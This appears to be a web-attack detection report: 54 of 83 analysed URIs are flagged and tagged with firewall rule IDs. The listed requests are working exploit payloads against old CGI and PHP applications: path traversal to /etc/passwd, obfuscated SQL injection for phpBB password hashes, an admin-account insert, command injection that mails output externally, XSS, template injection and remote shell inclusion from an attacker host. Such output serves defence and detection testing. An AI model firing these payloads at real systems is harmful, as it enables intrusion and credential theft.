---------------------- Statistics of URIs analyzed------------------------
[83] input, [29] clean, [54] attacks
--------------------------- Analysis results -----------------------------
Packet [1]	/cgi-bin//dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [2]	/scripts/convert.bas?../../setuplog.txt	Nattacks [3]	[930100]	[930110]	[949110]
Packet [4]	/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1	Nattacks [4]	[920270]	[930100]	[930110]	[949110]
Packet [5]	/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [7]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69o%6e%20%73e%6c%65%63t%20o%72%64%28sub%73%74%72i%6e%67%28u%73e%72%5f%70as%73w%6f%72%64	Nattacks [3]	[942190]	[942360]	[949110]
Packet [10]	/cgi-bin/results.jsp?query=%22%3E%3Cscript%3Efoo%3C/script%3E%22	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
Packet [13]	/cgi-bin/filemail.pl%0D	Nattacks [2]	[921190]	[949110]
Packet [14]	/cgi-bin/nph-maillist.pl?emailaddress=90112%40bigbrother.pl%3Bls%09-al%7Cmail%09mister_r%40ceres%2Eugr%2Ees	Nattacks [2]	[932100]	[949110]
Packet [15]	/%00/	Nattacks [2]	[920270]	[949110]
Packet [16]	/fcgi-bin/echo.exe?foo=%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
Packet [17]	/guestbook/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
Packet [19]	/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=%3Bcat%20/etc/hosts%7C&CODE=PHOLD	Nattacks [3]	[930120]	[932100]	[949110]
Packet [20]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6f%6e%20%73el%65c%74%20ord%28s%75b%73t%72%69n%67%28%75ser%5fpa%73s%77ord	Nattacks [3]	[942190]	[942360]	[949110]
Packet [22]	/graphics/sml3com%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s%25s	Nattacks [1]	[920220]
Packet [26]	/eManager/Content%20Management/ContentFilter.dll	Nattacks [2]	[920440]	[949110]
Packet [29]	/_vti_bin/_vti_aut/fp30reg.dll	Nattacks [2]	[920440]	[949110]
Packet [30]	/dir/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c%2B	Nattacks [3]	[930100]	[930110]	[949110]
Packet [32]	/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/hosts	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
Packet [33]	/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/host.allow%00	Nattacks [4]	[920270]	[930100]	[930110]	[949110]
Packet [35]	/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
Packet [36]	/gaestebuch/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fhosts%00	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
Packet [37]	/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/host.allow	Nattacks [3]	[930100]	[930110]	[949110]
Packet [40]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75ni%6f%6e%20s%65%6c%65%63%74%20%6f%72%64%28%73%75%62%73%74%72in%67%28u%73e%72%5f%70a%73swo%72%64%2c%33%2c%31%29%29%20%66%72o%6d%20phpbb%5f%75se%72s%20%77h%65%72e%20%75%73e%72_i%64=2/%2a&view=newest	Nattacks [4]	[942190]	[942270]	[942360]	[949110]
Packet [42]	/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd	Nattacks [5]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [43]	/scripts/autoexec.bat%22%2B&%2Bdir%2Bc:/windows/system32%2B.com	Nattacks [2]	[920440]	[949110]
Packet [44]	/cgi-bin/day5datacopier.cgi?distloc=%3Bcat%20/etc/passwd%0D	Nattacks [4]	[930120]	[932100]	[932160]	[949110]
Packet [45]	/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/hosts	Nattacks [4]	[930100]	[930110]	[930120]	[949110]
Packet [46]	/%7Eroot/NonExistent.html?configure=../../../../../../../../etc/passw	Nattacks [3]	[930100]	[930110]	[949110]
Packet [48]	/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert%28%27Vulnerable%27%29%3C/script%3E	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
Packet [49]	/cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00	Nattacks [4]	[920270]	[930120]	[932160]	[949110]
Packet [51]	/_private/form_results.txt%0D	Nattacks [2]	[921190]	[949110]
Packet [52]	/cgi-bin/sojourn.cgi?cat=../../../../../../etc/passwd%00	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [54]	/servlet/Sygate.Servlet.login?uid=%27%3binsert%20into%20CMS35%2eAdmin%20%28RecUpdateTime%2cLoginName%2cAdminNickName%2cPassword%2cAdminRights%2cAdminEmail%2cFailedLogin%2cAlertOnFailure%2cAlertFailureThreshold%2cOnlineState%29%20values%20%28getutcdate%28%29%2c%27reporting%27%2c%27reporting%27%2c0x10DDD9DCF0A5244E8BED97B540D1CE14E8D54A8E%2c%27255%27%2c%27%27%2c0%2c0%2c0%2c0%29%20%2d%2d%20&up=foo	Nattacks [3]	[942350]	[942360]	[949110]
Packet [55]	/intranet/browse.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%250	Nattacks [5]	[920220]	[930100]	[930110]	[930120]	[949110]
Packet [58]	/cgi-bin/sendtemp.pl?templ=/etc/hosts	Nattacks [2]	[930120]	[949110]
Packet [59]	/cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [60]	/common/listrec.pl?APP=qmh-news&TEMPLATE=%3Bls%20/etc%7C	Nattacks [2]	[932100]	[949110]
Packet [62]	/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd%00	Nattacks [6]	[920270]	[930100]	[930110]	[930120]	[932160]	[949110]
Packet [63]	/phpBB/viewtopic.php?t=17071&highlight=%22%3E%22%3CScript%3Ejavascript:alert%28d	Nattacks [6]	[941100]	[941110]	[941160]	[941170]	[941210]	[949110]
Packet [64]	/PHPLibrary-1.5.3/example/lib/stphpform.php?cfg_dir=http://www.atacante.com/shell.txt?&	Nattacks [2]	[931120]	[949110]
Packet [67]	/global.inc	Nattacks [2]	[920440]	[949110]
Packet [68]	/cfdocs/exampleapp/email/getfile.cfm?filename=c:%5Cboot.ini	Nattacks [2]	[930120]	[949110]
Packet [69]	/servlet/org.apache.catalina.Context/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E	Nattacks [2]	[941110]	[949110]
Packet [70]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69%6fn%20%73ele%63%74%20o%72%64%28s%75b%73t%72i%6eg%28%75s%65%72%5f%70%61s%73%77ord	Nattacks [3]	[942190]	[942360]	[949110]
Packet [71]	/mall_log_files/order.log	Nattacks [2]	[920440]	[949110]
Packet [72]	/cgi-bin/view-source?../../../../../../../etc/host.equiv	Nattacks [3]	[930100]	[930110]	[949110]
Packet [74]	/eManager/Email%20Management/cgi-bin/register.dll	Nattacks [2]	[920440]	[949110]
Packet [75]	/ROADS/cgi-bin/search.pl?form=/etc/passwd%00	Nattacks [4]	[920270]	[930120]	[932160]	[949110]
Packet [76]	/database/philboard.mdb	Nattacks [2]	[920440]	[949110]
Packet [77]	/misc.php?do=page&template=%7B%24%7Bsystem%28id%29%7D%7D	Nattacks [3]	[932130]	[933160]	[949110]
Packet [78]	/servlet/org.apache.catalina.servlets.WebdavStatus/%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E	Nattacks [2]	[941110]	[949110]
Packet [81]	/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert%28%22G%22%29%3C/script%3E	Nattacks [4]	[941100]	[941110]	[941160]	[949110]
Packet [82]	/cgi-bin/quikstore.cfg	Nattacks [2]	[920440]	[949110]
Packet [83]	/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts.allow%00	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[949110]
